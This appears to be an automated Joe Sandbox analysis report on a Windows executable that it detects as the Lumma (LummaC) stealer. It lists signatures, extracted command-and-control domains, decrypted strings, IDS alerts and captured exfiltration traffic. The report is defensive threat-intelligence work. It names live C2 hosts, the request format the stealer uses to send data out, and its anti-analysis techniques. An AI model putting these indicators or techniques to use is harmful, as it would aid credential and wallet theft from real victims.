Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1538068
MD5:ae7fda647df94fb9207204a517856151
SHA1:57e738f83c355c72b9d48e0b120a27c40889c38e
SHA256:7da052a541128f2cdacb400d37b765039cac8b4e293fc53a88ac721c144950c9
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7436 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AE7FDA647DF94FB9207204A517856151)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["clearancek.site", "mobbipenju.store", "dissapoiznw.store", "bathdoomgaz.store", "studennotediw.store", "eaglepawnoy.store", "licendfilteo.site", "spirittunek.store"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: file.exe PID: 7436JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      Process Memory Space: file.exe PID: 7436JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: file.exe PID: 7436JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
          decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-20T08:39:02.704882+020020546531A Network Trojan was detected192.168.2.449731104.21.53.8443TCP
            2024-10-20T08:39:04.345979+020020546531A Network Trojan was detected192.168.2.449732104.21.53.8443TCP
            2024-10-20T08:39:17.692929+020020546531A Network Trojan was detected192.168.2.449739104.21.53.8443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-20T08:39:02.704882+020020498361A Network Trojan was detected192.168.2.449731104.21.53.8443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-20T08:39:04.345979+020020498121A Network Trojan was detected192.168.2.449732104.21.53.8443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-20T08:38:59.636719+020020564771Domain Observed Used for C2 Detected192.168.2.4492411.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-20T08:38:59.571722+020020564711Domain Observed Used for C2 Detected192.168.2.4599151.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-20T08:38:59.614174+020020564811Domain Observed Used for C2 Detected192.168.2.4597021.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-20T08:38:59.602547+020020564831Domain Observed Used for C2 Detected192.168.2.4550491.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-20T08:38:59.660237+020020564731Domain Observed Used for C2 Detected192.168.2.4625431.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-20T08:38:59.584613+020020564851Domain Observed Used for C2 Detected192.168.2.4636701.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-20T08:38:59.648118+020020564751Domain Observed Used for C2 Detected192.168.2.4641201.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-20T08:38:59.626740+020020564791Domain Observed Used for C2 Detected192.168.2.4513551.1.1.153UDP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-20T08:39:07.882161+020020480941Malware Command and Control Activity Detected192.168.2.449734104.21.53.8443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-20T08:39:01.696060+020028586661Domain Observed Used for C2 Detected192.168.2.449730104.102.49.254443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: file.exeAvira: detected
            Antivirus detection for URL or domain
            Source: https://steamcommunity.com:443/profiles/76561199724331900URL Reputation: Label: malware
            Found malware configuration
            Source: file.exe.7436.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["clearancek.site", "mobbipenju.store", "dissapoiznw.store", "bathdoomgaz.store", "studennotediw.store", "eaglepawnoy.store", "licendfilteo.site", "spirittunek.store"], "Build id": "4SD0y4--legendaryy"}
            Multi AV Scanner detection for domain / URL
            Source: sergei-esenin.comVirustotal: Detection: 19%Perma Link
            Source: bathdoomgaz.storeVirustotal: Detection: 21%Perma Link
            Source: spirittunek.storeVirustotal: Detection: 21%Perma Link
            Multi AV Scanner detection for submitted file
            Source: file.exeVirustotal: Detection: 43%Perma Link
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: file.exeJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
            Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: licendfilteo.site
            Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: spirittunek.store
            Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: bathdoomgaz.store
            Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: studennotediw.store
            Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: dissapoiznw.store
            Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: eaglepawnoy.store
            Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: mobbipenju.store
            Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
            Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
            Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
            Source: 00000000.00000002.1851513309.00000000004D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49739 version: TLS 1.2

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.4:55049 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.4:49241 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.4:59702 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.4:51355 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.4:64120 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.4:62543 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.4:63670 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.4:59915 -> 1.1.1.1:53
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 104.21.53.8:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.53.8:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 104.21.53.8:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.53.8:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49734 -> 104.21.53.8:443
            Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49730 -> 104.102.49.254:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49739 -> 104.21.53.8:443
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: clearancek.site
            Source: Malware configuration extractorURLs: mobbipenju.store
            Source: Malware configuration extractorURLs: dissapoiznw.store
            Source: Malware configuration extractorURLs: bathdoomgaz.store
            Source: Malware configuration extractorURLs: studennotediw.store
            Source: Malware configuration extractorURLs: eaglepawnoy.store
            Source: Malware configuration extractorURLs: licendfilteo.site
            Source: Malware configuration extractorURLs: spirittunek.store
            Source: Joe Sandbox ViewIP Address: 104.21.53.8 104.21.53.8
            Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=bKmBZVeXetEUsJEvqQWppTmgKdLdaxlDFkrWihgCGmQ-1729406342-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: sergei-esenin.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=bKmBZVeXetEUsJEvqQWppTmgKdLdaxlDFkrWihgCGmQ-1729406342-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18168Host: sergei-esenin.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=bKmBZVeXetEUsJEvqQWppTmgKdLdaxlDFkrWihgCGmQ-1729406342-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8789Host: sergei-esenin.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=bKmBZVeXetEUsJEvqQWppTmgKdLdaxlDFkrWihgCGmQ-1729406342-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20442Host: sergei-esenin.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=bKmBZVeXetEUsJEvqQWppTmgKdLdaxlDFkrWihgCGmQ-1729406342-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1245Host: sergei-esenin.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=bKmBZVeXetEUsJEvqQWppTmgKdLdaxlDFkrWihgCGmQ-1729406342-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 586556Host: sergei-esenin.com
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=bKmBZVeXetEUsJEvqQWppTmgKdLdaxlDFkrWihgCGmQ-1729406342-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: sergei-esenin.com
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
            Source: file.exe, 00000000.00000002.1852469176.0000000001281000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.0000000001271000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ' https://cosergei-esenin.comsergei-esenin.comty/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcasQ7B equals www.youtube.com (Youtube)
            Source: file.exe, 00000000.00000003.1690568055.000000000129E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
            Source: file.exe, 00000000.00000003.1690697919.000000000128B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C0e3d185a3e106e73b244decdec33a0ea; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=af6637e6d5cd8f076664704a; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type34508Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSun, 20 Oct 2024 06:39:01 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
            Source: file.exe, 00000000.00000003.1690697919.000000000128B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
            Source: file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: t.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
            Source: file.exe, 00000000.00000003.1690793016.0000000001295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: t.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C0e3d185a3e106e73b244decdec33a0ea; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=af6637e6d5cd8f076664704a; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type34508Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSun, 20 Oct 2024 06:39:01 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
            Source: file.exe, 00000000.00000002.1852469176.0000000001281000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1850629516.0000000001271000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700772120.0000000001283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ty/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcas equals www.youtube.com (Youtube)
            Source: global trafficDNS traffic detected: DNS query: clearancek.site
            Source: global trafficDNS traffic detected: DNS query: mobbipenju.store
            Source: global trafficDNS traffic detected: DNS query: eaglepawnoy.store
            Source: global trafficDNS traffic detected: DNS query: dissapoiznw.store
            Source: global trafficDNS traffic detected: DNS query: studennotediw.store
            Source: global trafficDNS traffic detected: DNS query: bathdoomgaz.store
            Source: global trafficDNS traffic detected: DNS query: spirittunek.store
            Source: global trafficDNS traffic detected: DNS query: licendfilteo.site
            Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
            Source: global trafficDNS traffic detected: DNS query: sergei-esenin.com
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 20 Oct 2024 06:39:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JuaMAjSNvLuGswKX4gwL3ISsU7GnOoH0MZusFU17FC9mbzufQz1G7FfB2N7Y92jiEyom3BtaFgA8Z0QU%2F39MyShlH%2F08IL7HYshTvlUjz98zeevg4wkRztf3156isbPjuHmEgA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d5702296a0b535b-LAX
